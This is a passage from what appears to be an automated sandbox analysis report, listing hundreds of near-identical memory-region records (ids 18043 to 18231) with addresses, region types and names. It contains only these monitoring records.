"pagefile_0x0000000000610000" filename = "" Region: id = 18043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18076 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18077 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18078 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18079 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18103 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18108 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18109 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18112 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18113 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18130 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18131 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18132 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18133 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18153 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18154 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18155 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18156 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18157 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18158 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18159 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18160 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18161 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18162 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18163 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18164 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18165 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18166 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18167 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18168 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18169 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18170 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18171 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18172 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18173 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18174 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18196 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18197 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18198 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18199 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18200 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18227 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18228 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18231 start_va = 